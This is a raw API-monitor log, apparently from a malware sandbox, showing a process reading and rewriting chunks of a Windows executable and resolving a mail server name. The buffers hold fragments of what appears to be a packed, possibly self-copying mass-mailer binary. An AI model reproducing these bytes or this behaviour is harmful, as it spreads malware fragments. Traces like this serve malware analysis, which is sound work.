Buffer => MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x0e\x1f\xba\x0e\x00\xb4 \xcd!\xb8\x01L\xcd!This program cannot be run in DOS mode.
$\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00PE\x00\x00L\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x0f\x01\x0b\x01\x07\x00\x00`\x00\x00\x00\x10\x00\x00\x00\x80\x00\x00 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:03,085 | 1592 | NtReadFile |
Buffer => \xff\x87\xa8\x90\x00kernel32.d\xff\x9b\xe7\xdfll5root\IEFrame\x00ATV\xfe\xff\xfcH_Noterctrl_renwnd\x0f\xff\xb7\xff\xff|y_\xee\xcf\xb9\xdd\xdeg;\x84\x15\x80\xd4\x00\x1e8 \xb2\x9f\xfb\x15\x00\x8d\x06\x18x\xb6\xff\xff\xff\x0f@@\x03\x00\x1d+\xf4A\x81O\xcd\xfc\xff\xd7%k\x08\x00\x01@<\x8fS\x016@\xffn\xff\xdfT\xf1\xfd\xa73\xbb\xbd\x9aA\x14\x04W\x85\x0e\x06@]\x10\x00\x18\x04/\xb7\xdb\xdd@\x08\x1f\x00-
\x03y(\x07\xa4,\x8a\xdc\x02\x97\xbf\xfc\xe5\x00\xbe\x0e/\x1b\x00\x00\xbf\x06\xa78\x04\x00\x85/\x05\x13\xb7\xb7\xff\xf2\x01\x00\x15]\x8e_\xce\x0bDec\x00\xa3v\x00O\x9f\x00S\xdd\xbe\xfb\xdbep^ug\x00Jul\x03n\x00May\x0fprk\x97\xed\xcd\x07\x03Feb\x13aSa'\xdds\xb7\xed\x7fi\x00Thu FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,085 | 1592 | NtWriteFile |
Buffer => \xff\x87\xa8\x90\x00kernel32.d\xff\x9b\xe7\xdfll5root\IEFrame\x00ATV\xfe\xff\xfcH_Noterctrl_renwnd\x0f\xff\xb7\xff\xff|y_\xee\xcf\xb9\xdd\xdeg;\x84\x15\x80\xd4\x00\x1e8 \xb2\x9f\xfb\x15\x00\x8d\x06\x18x\xb6\xff\xff\xff\x0f@@\x03\x00\x1d+\xf4A\x81O\xcd\xfc\xff\xd7%k\x08\x00\x01@<\x8fS\x016@\xffn\xff\xdfT\xf1\xfd\xa73\xbb\xbd\x9aA\x14\x04W\x85\x0e\x06@]\x10\x00\x18\x04/\xb7\xdb\xdd@\x08\x1f\x00-
\x03y(\x07\xa4,\x8a\xdc\x02\x97\xbf\xfc\xe5\x00\xbe\x0e/\x1b\x00\x00\xbf\x06\xa78\x04\x00\x85/\x05\x13\xb7\xb7\xff\xf2\x01\x00\x15]\x8e_\xce\x0bDec\x00\xa3v\x00O\x9f\x00S\xdd\xbe\xfb\xdbep^ug\x00Jul\x03n\x00May\x0fprk\x97\xed\xcd\x07\x03Feb\x13aSa'\xdds\xb7\xed\x7fi\x00Thu FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:03,095 | 1592 | NtReadFile |
Buffer => e\xcf\x97\xe0 \xb7\xbf\xf5\xcd\xba\x04{$t|\xf3 $T},{\x0c{M\x07\xadf\xe0|m}\x1c \xf9U\xc4\xe0\xf6`m|\xa4\x02} \x8c\xd8\x02\x0e\x0c\x9d@\xd4|
1\xd6\x1a\x0ci\x18\x1d@ \x8b\x02\x97(.\xd9d \x94\xbc\x83?hm $A+rm b\xedo
\x9aXM){:|,}|\x01m\x83\xdf\x02\xa2t\x14 kTw%\x95h\x1d|\x19|\xda ,\x86_{\xef\xa0\x10t}{.|*)\x00}m\xad\xb5\xdb
\x01{W\x1f'\x88.d6\x13G\xa2<\xd0|f_\x05r\x9fh\xad\xdd\x0cei\x17u\x083s}\xdb]\xbb{i^|Y}\x1f\xdce{-Amm\x9bD{\xd0\x06\x93\x1c{!\xb0\xdd\xe0\x16BbeL|w\x08}n\xad\xb5\xf7\x05d\xaf\x06O\xe6\x1dla\xebZ\x8b\x0e\xb4|\x7f\x04\xf5m1\xd6\xa0\x15\xde\xde\x19\x08\x1b\xdbV\xe8h\xeeci|\xcf\x81m FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,095 | 1592 | NtWriteFile |
Buffer => e\xcf\x97\xe0 \xb7\xbf\xf5\xcd\xba\x04{$t|\xf3 $T},{\x0c{M\x07\xadf\xe0|m}\x1c \xf9U\xc4\xe0\xf6`m|\xa4\x02} \x8c\xd8\x02\x0e\x0c\x9d@\xd4|
1\xd6\x1a\x0ci\x18\x1d@ \x8b\x02\x97(.\xd9d \x94\xbc\x83?hm $A+rm b\xedo
\x9aXM){:|,}|\x01m\x83\xdf\x02\xa2t\x14 kTw%\x95h\x1d|\x19|\xda ,\x86_{\xef\xa0\x10t}{.|*)\x00}m\xad\xb5\xdb
\x01{W\x1f'\x88.d6\x13G\xa2<\xd0|f_\x05r\x9fh\xad\xdd\x0cei\x17u\x083s}\xdb]\xbb{i^|Y}\x1f\xdce{-Amm\x9bD{\xd0\x06\x93\x1c{!\xb0\xdd\xe0\x16BbeL|w\x08}n\xad\xb5\xf7\x05d\xaf\x06O\xe6\x1dla\xebZ\x8b\x0e\xb4|\x7f\x04\xf5m1\xd6\xa0\x15\xde\xde\x19\x08\x1b\xdbV\xe8h\xeeci|\xcf\x81m FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:03,095 | 1600 | gethostbyname |
Name => mail-in4.apple.com |
SUCCESS | 0x0016cb28 | |
| 07:45:03,095 | 1592 | NtReadFile |
Buffer => \xd4\x80l\x14\x85dW\xa9\xd4\xfeL$w{S\x17\xf9\xd2un\xb7] d [\xe5]|\x08i|\xeb\xc2\xbe\xafZ\x96-\x00 \xe4a\xb1\x1c\x07\x0cnrR\x9b\x1e\x98\xc5\\xfb\xda\xa7n\xfbfSm\x82\xb0=C\xac\x1a8P\xdf\xbdt\xb6\x1a\xc1fvMa\xa0c\x14k\x06\xae\xc6 \xb3\x93\xcd\x1e\xce\xf3R\x80g@.\xb7=Zk\x00\xb8\xeb1\k~\x0c\xda\xe3\x89\x0bh\x96\xaa\x89\xb9\x9c\x9b\x14TDFQ\xe2\xedSk1\xbe\xbd{>\x00 MA\xdc\xb6\xe8\xde\xef F{\xe2|\xfbM\x16$f^s}3s\x00 50$\xfb
_`{P\xea5R.\xb8RA5\x1a[\xd7\xd5\x88 D\x00_\xec\x034\xf7\x11U^
\x14|A\xfa\xcd\xe1\xc0\xc0R\xa3s\x11\x97\x01\x96\x1a\xcb\xbakgSf\xbc\xf7
,554 \xf1UI\xb5\xb6\xd0\x96\x8eo\xb8\x14xU \x89\xd6\x96\xd4MM\xa8\xc7\xc8\x1c\xe0\x0e\xcc\x10 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,095 | 1592 | NtWriteFile |
Buffer => \xd4\x80l\x14\x85dW\xa9\xd4\xfeL$w{S\x17\xf9\xd2un\xb7] d [\xe5]|\x08i|\xeb\xc2\xbe\xafZ\x96-\x00 \xe4a\xb1\x1c\x07\x0cnrR\x9b\x1e\x98\xc5\\xfb\xda\xa7n\xfbfSm\x82\xb0=C\xac\x1a8P\xdf\xbdt\xb6\x1a\xc1fvMa\xa0c\x14k\x06\xae\xc6 \xb3\x93\xcd\x1e\xce\xf3R\x80g@.\xb7=Zk\x00\xb8\xeb1\k~\x0c\xda\xe3\x89\x0bh\x96\xaa\x89\xb9\x9c\x9b\x14TDFQ\xe2\xedSk1\xbe\xbd{>\x00 MA\xdc\xb6\xe8\xde\xef F{\xe2|\xfbM\x16$f^s}3s\x00 50$\xfb
_`{P\xea5R.\xb8RA5\x1a[\xd7\xd5\x88 D\x00_\xec\x034\xf7\x11U^
\x14|A\xfa\xcd\xe1\xc0\xc0R\xa3s\x11\x97\x01\x96\x1a\xcb\xbakgSf\xbc\xf7
,554 \xf1UI\xb5\xb6\xd0\x96\x8eo\xb8\x14xU \x89\xd6\x96\xd4MM\xa8\xc7\xc8\x1c\xe0\x0e\xcc\x10 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:03,105 | 1592 | NtReadFile |
Buffer => \x18nM\xe7\xe8\xd2R\xc1/l1o\xb6Ex\x0b\x94v`
D6.\xa9\xb26+|\xccu\x040\x003IMEO(4\xfb\xd0\xc8U\x89\x80PBy@\xb2\x9d\xa1\x01M\xce\x1e V9\x1d\xae\xb66\x01\x9bCB2-*\x94\xb6\xd6Ty\x94@mX\xd5\xb8m\x0b\x1b\xact/\xf3xG;! b\xed-\xbc\x1d\xee\x11y="N"1\x00\x0f4\xf4k\x05q-V\xcei\x801h\xce\x11kO\x18\xfcC\x07b\xad\x19h\x98j\x8b
1\x17\xd0\xa0a\x06\x85
7\xd6>1\xac\x9f
\x8b=_\x0b\x02>\xceO\xf7.3u\x0448X.\xe3N\xda\x8b\x99kP\x8cs6+\xb0\xf7f'\xbdI?G\xc1\xa9\x02\x94\xbaa\xcd\xff r\xb4V\x18/\xde\x18\x17\xb96s\xf0\x99\xd8\xcan\xcf\xc64\x8d
zZjf0E\x88lC\xdb\xa1o~Ab164"\xbd\xd7\xd4\xb8D\xfb@iQ\xb8\xda\x0b\xd8\xe9H\x84L\x8f: FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,105 | 1592 | NtWriteFile |
Buffer => \x18nM\xe7\xe8\xd2R\xc1/l1o\xb6Ex\x0b\x94v`
D6.\xa9\xb26+|\xccu\x040\x003IMEO(4\xfb\xd0\xc8U\x89\x80PBy@\xb2\x9d\xa1\x01M\xce\x1e V9\x1d\xae\xb66\x01\x9bCB2-*\x94\xb6\xd6Ty\x94@mX\xd5\xb8m\x0b\x1b\xact/\xf3xG;! b\xed-\xbc\x1d\xee\x11y="N"1\x00\x0f4\xf4k\x05q-V\xcei\x801h\xce\x11kO\x18\xfcC\x07b\xad\x19h\x98j\x8b
1\x17\xd0\xa0a\x06\x85
7\xd6>1\xac\x9f
\x8b=_\x0b\x02>\xceO\xf7.3u\x0448X.\xe3N\xda\x8b\x99kP\x8cs6+\xb0\xf7f'\xbdI?G\xc1\xa9\x02\x94\xbaa\xcd\xff r\xb4V\x18/\xde\x18\x17\xb96s\xf0\x99\xd8\xcan\xcf\xc64\x8d
zZjf0E\x88lC\xdb\xa1o~Ab164"\xbd\xd7\xd4\xb8D\xfb@iQ\xb8\xda\x0b\xd8\xe9H\x84L\x8f: FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:03,105 | 1592 | NtReadFile |
Buffer => \xc8\xf4j\xf5a\x07\xf6v\x97\xcd\xc2f\xf7\xf8.\x8c\xf9\xfax\xfbe\xdfo\x1a
J\x07\x88\x8bE\x08\x8b=\x84\xd8\x8d~v\xe1\x7f@\x83\xc0\x04QP\x89\xb9\xff\xd7\xee\x89]\x089\x85\xf3\xe5\xd6\x02\\xd8\xfeu\x0eh\x18@\xdf\xa6{\x9f\x80\x0cP\x0e\x98|8\x9d!\x0f/\xd6\xcd\xdc\x84\xa9\x9f-&xV\x0cv\xd2\xf0\xfeI\x80<\x08\t\x0e\x19<\x90\x8d\xa3\xa6{v\xd8P+\xd6\x08j 6t(\xd8w\x0b\xdf\x80Ij\x02Sj\x034\x02\x7f\xd39\xd3\x1cp;\xc3t2\x83\xf8\xff|\x92\x1dv\xbaclph\x0cG:&4\x14\x10\x11d\xeb\x10\xdf\xee\xccd%`>u\x0f\xff\xfb\x83}\x08\x02\xb8\xc3\x9a\xe1\x0f\x8c\x19k\xcf u\xfd>\x9a\x91b,\x1f<5\x90W\xd6-<:w\xbfudP\x0b\xc4bi\x9a\xa5\xc7h\xc56\xc4\xc5\xc6\xa6i\x9a\xa6\xc7\xc8\xc9\xca\xcb\x9a\xa6i\x9a\xcc\xcd\xce\xcf\xd0\xd15M\xb3m\xd2s7\xd3\xd4 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,105 | 1592 | NtWriteFile |
Buffer => \xc8\xf4j\xf5a\x07\xf6v\x97\xcd\xc2f\xf7\xf8.\x8c\xf9\xfax\xfbe\xdfo\x1a
J\x07\x88\x8bE\x08\x8b=\x84\xd8\x8d~v\xe1\x7f@\x83\xc0\x04QP\x89\xb9\xff\xd7\xee\x89]\x089\x85\xf3\xe5\xd6\x02\\xd8\xfeu\x0eh\x18@\xdf\xa6{\x9f\x80\x0cP\x0e\x98|8\x9d!\x0f/\xd6\xcd\xdc\x84\xa9\x9f-&xV\x0cv\xd2\xf0\xfeI\x80<\x08\t\x0e\x19<\x90\x8d\xa3\xa6{v\xd8P+\xd6\x08j 6t(\xd8w\x0b\xdf\x80Ij\x02Sj\x034\x02\x7f\xd39\xd3\x1cp;\xc3t2\x83\xf8\xff|\x92\x1dv\xbaclph\x0cG:&4\x14\x10\x11d\xeb\x10\xdf\xee\xccd%`>u\x0f\xff\xfb\x83}\x08\x02\xb8\xc3\x9a\xe1\x0f\x8c\x19k\xcf u\xfd>\x9a\x91b,\x1f<5\x90W\xd6-<:w\xbfudP\x0b\xc4bi\x9a\xa5\xc7h\xc56\xc4\xc5\xc6\xa6i\x9a\xa6\xc7\xc8\xc9\xca\xcb\x9a\xa6i\x9a\xcc\xcd\xce\xcf\xd0\xd15M\xb3m\xd2s7\xd3\xd4 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:03,115 | 1592 | NtReadFile |
Buffer => \xc9\x08:\x02\x18AB\xeb\xedP\x01\x02/\xff\xe2\xf1
+\xc17'VW\x8b}\xf6\x89u/\xd0q\xe1\xf8\x80?I\x84H+S\xd6>&\x0f\xcc\xd2\xdd\xdc\x851
\x16\xfcF
##\xeey\xe2\x97\xf3F\x0f\xbe\x04>\xca\x11Y\\xdf\xda\xffo\x0e\x88D\x1d\xdcCF\x83\xfb\x0fr\xe2\x80d
%\xc98M\xdc\xf87\x13\xb7\x89\x7ft\x16\xc6/\x10@\x8d\x0c\x89\x808\xbcs\x05\xde\x1fLJ\xd0\x83\x17O;u\x01F\x19'~7\xde\x8e\xce\x00Tj\x14\xef\x99\xb7\x13M\xb8\xf8\xa2=\xba\x96 ]\x8e\x16\x8b\xdb\xdd\x88\x19\xeb\x16\x10%pD\xb9\xb5\xa5\x08\x90P
\x7f\xb8\x10\xee\x16\\xb7\xff\xdc\xb0\x8bB0\xfc +\xf3Pa\x07\xcf\xda\xae\xf4\xc4;\xf0\xedtQ+\xfe\xd9\xbf\xb5\x03\xf3\xee\x1c>\x8d4\x08\x03\xf7\x1a\x8b\xcf+\xcb;\xf3\xf5[\xbb\xd4\x8d\x15s\x1b\xf7\x85~+\x8b\xc3+o\x7f\xfb\xb6'\x03/\x8a\x143\x88\xadF;\xf1|\xf5\xeb FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,115 | 1592 | NtWriteFile |
Buffer => \xc9\x08:\x02\x18AB\xeb\xedP\x01\x02/\xff\xe2\xf1
+\xc17'VW\x8b}\xf6\x89u/\xd0q\xe1\xf8\x80?I\x84H+S\xd6>&\x0f\xcc\xd2\xdd\xdc\x851
\x16\xfcF
##\xeey\xe2\x97\xf3F\x0f\xbe\x04>\xca\x11Y\\xdf\xda\xffo\x0e\x88D\x1d\xdcCF\x83\xfb\x0fr\xe2\x80d
%\xc98M\xdc\xf87\x13\xb7\x89\x7ft\x16\xc6/\x10@\x8d\x0c\x89\x808\xbcs\x05\xde\x1fLJ\xd0\x83\x17O;u\x01F\x19'~7\xde\x8e\xce\x00Tj\x14\xef\x99\xb7\x13M\xb8\xf8\xa2=\xba\x96 ]\x8e\x16\x8b\xdb\xdd\x88\x19\xeb\x16\x10%pD\xb9\xb5\xa5\x08\x90P
\x7f\xb8\x10\xee\x16\\xb7\xff\xdc\xb0\x8bB0\xfc +\xf3Pa\x07\xcf\xda\xae\xf4\xc4;\xf0\xedtQ+\xfe\xd9\xbf\xb5\x03\xf3\xee\x1c>\x8d4\x08\x03\xf7\x1a\x8b\xcf+\xcb;\xf3\xf5[\xbb\xd4\x8d\x15s\x1b\xf7\x85~+\x8b\xc3+o\x7f\xfb\xb6'\x03/\x8a\x143\x88\xadF;\xf1|\xf5\xeb FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:03,115 | 1592 | NtReadFile |
Buffer => \x94\xfc\x8e\xcd\xb1`\xc6\x02\xa5f\x01\xd7\xaf\xfd\x9d\\x85g\xa5%\xff?\x0bT\xf6\x8d\xc6\xbb\x12\x04|\xa6\xeb\x0biv|7\xff.\xa8\x99\xfeJ\xffN\x85\xf6\x7f\xf4\x80$\xf7@^t\x03\xf7\xfa\xc4\xad\xa9\x92\xa7\x1a\xe70P[\xcc\x10\xcex{F\xae\xc8\xf6\xb1u\xe8^\x1b(\x05Z\xe9\xaf\xa0j\x0cX
\xcb#p\xdbxk<\x02\xf4}\x079\xe9\x16+u\xbf\xd8\x85\xa1ESr\x8b\xdeP)&\x85\xc1n\xf0\x8b\xd8Y;\x17Y|\x1fs\x00\xd4m[\xdbF
\x03N\xd6\xc15\xf8\x08\x06n\xb3\x80\xeb(\xf4T\xe0\xeb\x03:\x8b\x0eXp/\xb5\xd2\xc9\x14\x01\xddx\x01\x19\xd8\\x10\xbd\xdc\xee\xa2|\xcd\x12a`\x7f \x8dC
\x1a\x14L\xd7\xde5\x9c\x02I\xdeRa\x12\xa1C\xe9\xe9C\x12\xd8\x05\xeb\xee\x0c\x83\xc3\x06\x0e\xe2
\xe4Cw[-a\x8fK\xc3W\xe8>\x7fa\xbe\x03\x03f\x80$\x80\xfa\xd01!@\xf7\xf6\xf8\x85\xff\xab\xect FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,115 | 1592 | NtWriteFile |
Buffer => \x94\xfc\x8e\xcd\xb1`\xc6\x02\xa5f\x01\xd7\xaf\xfd\x9d\\x85g\xa5%\xff?\x0bT\xf6\x8d\xc6\xbb\x12\x04|\xa6\xeb\x0biv|7\xff.\xa8\x99\xfeJ\xffN\x85\xf6\x7f\xf4\x80$\xf7@^t\x03\xf7\xfa\xc4\xad\xa9\x92\xa7\x1a\xe70P[\xcc\x10\xcex{F\xae\xc8\xf6\xb1u\xe8^\x1b(\x05Z\xe9\xaf\xa0j\x0cX
\xcb#p\xdbxk<\x02\xf4}\x079\xe9\x16+u\xbf\xd8\x85\xa1ESr\x8b\xdeP)&\x85\xc1n\xf0\x8b\xd8Y;\x17Y|\x1fs\x00\xd4m[\xdbF
\x03N\xd6\xc15\xf8\x08\x06n\xb3\x80\xeb(\xf4T\xe0\xeb\x03:\x8b\x0eXp/\xb5\xd2\xc9\x14\x01\xddx\x01\x19\xd8\\x10\xbd\xdc\xee\xa2|\xcd\x12a`\x7f \x8dC
\x1a\x14L\xd7\xde5\x9c\x02I\xdeRa\x12\xa1C\xe9\xe9C\x12\xd8\x05\xeb\xee\x0c\x83\xc3\x06\x0e\xe2
\xe4Cw[-a\x8fK\xc3W\xe8>\x7fa\xbe\x03\x03f\x80$\x80\xfa\xd01!@\xf7\xf6\xf8\x85\xff\xab\xect FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:03,125 | 1592 | NtReadFile |
Buffer => \x19-\xfbY\xfd\xd3\x04k\xc0X\x06\xf5\x9b\xfb\x95\xe5d\xe1:\xf9\x83z\xfftb\xd1\xfdv1.1-\x05\xe9 \xef\x8e\x0c\x0b\xa1\x04\xf9\xc3\x8b\xab\xa9mF\x17\xb6\xf8WH\x80\x03\x80\xea\xd0\xae\x85.@2<\xae\xba3Hm\x87tSg\x10^$\x01w\x90\xc1\x0f\x0c3\x8a\x0e\xd6\xf4m\x1c`\x15\xe2\x9dY\x13\x1fl[\xa3c{u\xc5\xbb,\xc0\x1c\x0c\xdb\xe2\x99\xcd0\x08\x1d\x17F27\\xe2\x96\x05u\xe3\xd9\x89\\xd9<<@\xb1\x92\xcb\xdet?(T\x14\xde\x7f\x15\xacwx\x97\x88\x04+CY<\x19\x16\xba\xc1J\xbdo@\x987\x8cTk\x89\xedzO\xf9\x04+\x017 \xdd\x83\x1f\xd8\xebP\xc4+@\x0f\xc2\xce\x16\xb2\x98\x15*\x85\x0b\xdd\x8e\xe4+\x06^+@\xdcK%\xdc\xb6\xd5y\xada+\x15\x8b\x83\xb3\xc0\xb67h\x11q\xf7\xeb>>\x06=g\x89#{\x13\x8a\x06<\x1b\xa6+j\xb2w\x89\x80\xe4t\x0f-\xcdY\xd7x
\xd0 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,125 | 1592 | NtWriteFile |
Buffer => \x19-\xfbY\xfd\xd3\x04k\xc0X\x06\xf5\x9b\xfb\x95\xe5d\xe1:\xf9\x83z\xfftb\xd1\xfdv1.1-\x05\xe9 \xef\x8e\x0c\x0b\xa1\x04\xf9\xc3\x8b\xab\xa9mF\x17\xb6\xf8WH\x80\x03\x80\xea\xd0\xae\x85.@2<\xae\xba3Hm\x87tSg\x10^$\x01w\x90\xc1\x0f\x0c3\x8a\x0e\xd6\xf4m\x1c`\x15\xe2\x9dY\x13\x1fl[\xa3c{u\xc5\xbb,\xc0\x1c\x0c\xdb\xe2\x99\xcd0\x08\x1d\x17F27\\xe2\x96\x05u\xe3\xd9\x89\\xd9<<@\xb1\x92\xcb\xdet?(T\x14\xde\x7f\x15\xacwx\x97\x88\x04+CY<\x19\x16\xba\xc1J\xbdo@\x987\x8cTk\x89\xedzO\xf9\x04+\x017 \xdd\x83\x1f\xd8\xebP\xc4+@\x0f\xc2\xce\x16\xb2\x98\x15*\x85\x0b\xdd\x8e\xe4+\x06^+@\xdcK%\xdc\xb6\xd5y\xada+\x15\x8b\x83\xb3\xc0\xb67h\x11q\xf7\xeb>>\x06=g\x89#{\x13\x8a\x06<\x1b\xa6+j\xb2w\x89\x80\xe4t\x0f-\xcdY\xd7x
\xd0 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:03,125 | 1592 | NtReadFile |
Buffer => \xe2\xc4\xc7\x0f\xa7\x0ej\xc3\xe2-\xd8\xd9D=\xeb?W\x16\xddb\x18\xf0\x80f\x05\x00\x95\x1c\x01\x8a\xaf\x99\xb0K\xcf\x88\x06d\x84\xa1|\xb9\x88\xb5h\x1d$\x85\xd1e\xe8P\x93\xc8\x04yP\xa1\xb3$
x\xfe
P\x1f5\x0b\xb5<g,\x14c\xfe;7{\x13\xf2)\xfc\xfcl0\x12\xfef\xcf\xd9<-\xfc
\x1e\x17=\xfcY'\xdb\x16\x86I4\xff\xd7\xe4\xe0\xfe\xbaX8\xf2\x08\x16\x17\xce7\x04YH\x06\x8d\x8c<Zb\xd6\xb6\xad\xeb\x88\xb0\x84\xa9\xcdn\xf1\xeaey\x98\xf9!\x06F>\xcc\xa6\x1a\xaa\xf8,\x84\x8c2\xcc\x06\xc4.\x95\x1c\x14\xf7\xf6*>\xf5\xee\xbb\x8fbt'A;\xca|\xf4\x0bh\x83\xc0
`\xa4\xf8h-\x0c\x0c\xe7\xf4&d\xa8\x7f5R@j\x7fP\x10V\x80Pg\xce x-P\x9e\xef\xbe\xc3w!"Vc-t#Vh\x7fG\x0b\xee\xe7{\xb5\xb7\x9c\x83\xc5x\xf4\xfe\x94d\xc1\x158\xb8\xed\xfb\x10\xed+\x1a\xbe
FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,125 | 1592 | NtWriteFile |
Buffer => \xe2\xc4\xc7\x0f\xa7\x0ej\xc3\xe2-\xd8\xd9D=\xeb?W\x16\xddb\x18\xf0\x80f\x05\x00\x95\x1c\x01\x8a\xaf\x99\xb0K\xcf\x88\x06d\x84\xa1|\xb9\x88\xb5h\x1d$\x85\xd1e\xe8P\x93\xc8\x04yP\xa1\xb3$
x\xfe
P\x1f5\x0b\xb5<g,\x14c\xfe;7{\x13\xf2)\xfc\xfcl0\x12\xfef\xcf\xd9<-\xfc
\x1e\x17=\xfcY'\xdb\x16\x86I4\xff\xd7\xe4\xe0\xfe\xbaX8\xf2\x08\x16\x17\xce7\x04YH\x06\x8d\x8c<Zb\xd6\xb6\xad\xeb\x88\xb0\x84\xa9\xcdn\xf1\xeaey\x98\xf9!\x06F>\xcc\xa6\x1a\xaa\xf8,\x84\x8c2\xcc\x06\xc4.\x95\x1c\x14\xf7\xf6*>\xf5\xee\xbb\x8fbt'A;\xca|\xf4\x0bh\x83\xc0
`\xa4\xf8h-\x0c\x0c\xe7\xf4&d\xa8\x7f5R@j\x7fP\x10V\x80Pg\xce x-P\x9e\xef\xbe\xc3w!"Vc-t#Vh\x7fG\x0b\xee\xe7{\xb5\xb7\x9c\x83\xc5x\xf4\xfe\x94d\xc1\x158\xb8\xed\xfb\x10\xed+\x1a\xbe
FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:03,125 | 1592 | NtReadFile |
Buffer => 3\x18l_a^\xfd[\xcc\x08p\x9b\xd9\x88\xd3}8\xd6\xc4]j\xfb\x0b\x8d\x8d_\x01O\xf8\x8d\x1e\xff-\xbcu]5\xb3\x15\x85P\xcf~\x13\x04D\x96\x1c\x17*\xaf\x94\x10\x17\xd9\xccI]\xa8\x117\x9f\x7f\xed\xb9\x12}#\xbe\x11\xcf\xbe\x19\x140\x80\xba\x18\x16@Y|\xed\xeb\x0e\xb7\x1a5\xe9\x141b\xb7\xc8|r+\xfc\xff\xee\x8dQ\x03;\xd0}e;\xcf}a;\xc1WO\\x06\xbf\xb56\xd8\xbb!H\x12O\xd8\xf8;\xc2~C\xb5\xe2M\xfc;\xc7~?+\xc1\x0c\xff\x07|6Km\xb1\xd1/\x16\x03\xce;\xd7}\xac\x01\x8f\x15\xd1\x10|S\x11BA\x81\xfa\xfeR\xe9\x1eH\xf5Z\xf7\x1076;[\xe6\xc2\x97\xcb\x8b\xfb;}\x0c\x8c1\x89\x8b6u\x12mB_h\x14\x11h\x10\x14X\x08\xb8@-V\xc0\x83\xc4\x06Mu\xb5>\xe3V\xea\x00\xcaI\x00\x03\xfa\x80\xd7`\xb0\x07(p(\xecm\x1d\xb5(\xd1\x8f\x9a{W\xce\x0f\xc2\xaeD\x13 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,125 | 1592 | NtWriteFile |
Buffer => 3\x18l_a^\xfd[\xcc\x08p\x9b\xd9\x88\xd3}8\xd6\xc4]j\xfb\x0b\x8d\x8d_\x01O\xf8\x8d\x1e\xff-\xbcu]5\xb3\x15\x85P\xcf~\x13\x04D\x96\x1c\x17*\xaf\x94\x10\x17\xd9\xccI]\xa8\x117\x9f\x7f\xed\xb9\x12}#\xbe\x11\xcf\xbe\x19\x140\x80\xba\x18\x16@Y|\xed\xeb\x0e\xb7\x1a5\xe9\x141b\xb7\xc8|r+\xfc\xff\xee\x8dQ\x03;\xd0}e;\xcf}a;\xc1WO\\x06\xbf\xb56\xd8\xbb!H\x12O\xd8\xf8;\xc2~C\xb5\xe2M\xfc;\xc7~?+\xc1\x0c\xff\x07|6Km\xb1\xd1/\x16\x03\xce;\xd7}\xac\x01\x8f\x15\xd1\x10|S\x11BA\x81\xfa\xfeR\xe9\x1eH\xf5Z\xf7\x1076;[\xe6\xc2\x97\xcb\x8b\xfb;}\x0c\x8c1\x89\x8b6u\x12mB_h\x14\x11h\x10\x14X\x08\xb8@-V\xc0\x83\xc4\x06Mu\xb5>\xe3V\xea\x00\xcaI\x00\x03\xfa\x80\xd7`\xb0\x07(p(\xecm\x1d\xb5(\xd1\x8f\x9a{W\xce\x0f\xc2\xaeD\x13 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:45:03,135 | 1592 | NtReadFile |
Buffer => \xbd\x05PO\xd5\x05\xb3\x16?\x80<8\\xf9\x19<;\x10g\x0e\x15]\x11x\x18\xc9r\x8c\x93h@k\xa4\xfdV}\xb6\x95*\xfb\x92\xfc\x15Pu#\x00\x91\xa7\xe05\xd90\xe0X1\xbbzu\x03#O\xeb\x11\x1f\xce\x8a\x8f\x98$k\xac\xd7\xbd\xd0\xe7f\xdbp<;\x1b\x08\xd1\x00t\xae\xcc0\xb2|\x11 \xd2\x9c\x0fZ\xbeQ6\xd9\xc5P\xbeTP\xb7\x88}\xc9+\x13\xf6\xa5\xcc j
\xbb\xc0\x84K(\x89\x0cH"A\xd8QvVB\xa9JCH'X\xe1\x17\xb1\xb5\xd4P-Yy\x19\xf8\xf8\xa0\xb1\xbc\x1cN[u\xca\x03N\x19F\x9b\xb4\x18\xaf
